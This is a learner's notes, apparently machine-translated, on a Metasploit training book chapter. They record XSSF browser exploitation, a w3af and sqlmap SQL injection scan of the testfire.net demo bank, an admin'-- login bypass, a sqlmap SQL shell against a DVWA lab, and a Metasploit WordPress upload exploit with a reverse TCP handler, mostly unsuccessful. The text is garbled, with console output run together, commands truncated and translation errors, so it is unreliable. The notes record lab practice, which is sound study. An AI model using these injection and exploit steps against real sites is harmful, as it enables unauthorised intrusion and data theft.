"Metasploit Devil Training Camp" chapter fourth (under)

p163 XSSF

The default Kali 2.0 does not have XSSF, first download: https://code.google.com/archive/p/xssf/downloads

Unzip the downloaded zip file, merge the data, plugins, lab and other folders into the appropriate folder in the/usr/share/metasploit-framework/, then load XSSF in Msfconsole.

According to the book, but the final attack did not succeed!

8  the ['...] ['exploit:windows/browser/ie_createobject'[*] Exploit execution Started, press [CTRL + C] to stop it! [+] Remaining victims to attack: [[1] (1)]  (stop here to stay)^c[-] Exploit interrupted by the Console user

p180 Practical Work

1. Probing SQL injection vulnerability in www.testfire.net:

[Email protected]:~# w3af_console W3af>>>PLUGINSW3AF/plugins>>>Audit Sqli W3af/plugins>>>Crawl Web_spider w3af/plugins>>>BACKW3AF>>>TARGETW3AF/config:target>>> Set Target http://www.testfire.net/bank/login.aspxW3af/config:target>>>backthe configuration has been saved.w3af>>>PLUGINSW3AF/plugins>>>Output html_file w3af/plugins>>>output config html_file w3af/plugins/output/config:html_file>>>set verbose True w3af/plugins/output/config:html_file>>>backthe configuration has been saved.w3af/plugins>>>BACKW3AF>>> start

Successfully swept out 8 URLs and different injections points.

Sweep with Sqlmap.

" http://www.testfire.net/bank/login.aspx " " Uid=admin&passw=a&btnsubmit=login "

Detect some information from the background database

Easily login in http://www.testfire.net/bank/login.aspx by constructing admin '--input.

But how do you get the information in the database further? I'm not done yet.

2, according to the book p163 do can

3, WXF:HTTPS://GITHUB.COM/FORCED-REQUEST/WXF

Unzip after download, switch to unzip directory, run./console, prompt

/usr/lib/ruby/2.2. 0/rubygems/core_ext/kernel_require.rb:si: in ' Require': Cannot load such FILE--Iconv (Loaderror)

Because of the lack of familiarity with Ruby, the online approach also does not understand, skip.

4, I choose this vulnerability to test https://www.exploit-db.com/exploits/37182/

However, the resulting test results are:

Do not know whether the background Server software version issue.

5, do not know how to get. Skip first.

6. Successfully implanted SQL shell! with the following command

' http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit# '  --cookie='security=low; PHPSESSID=7918OEOATNUR63RQ8BOKN88SD2' --sql-shell

7, p177

Follow the prompts step-by-step, but without success:

[*] Started Reverse TCP handler on10.10.10.128:4444 [*] successfully uploaded shell. [*] Trying to access shell at <! DOCTYPE HTML Public"-//ietf//dtd HTML 2.0//en">Head><title>413Request Entity Too large</title></Head><body>The requested resource&LT;BR/>/wordpress//wp-content/plugins/1-flash-gallery/upload.php<br/>Does not allow request for data with POST requests, or the amount of data providedinchThe request exceeds the capacity limit.</body>... [*] Exploit completed, but no session is created.

"Metasploit Devil Training Camp" chapter fourth (under)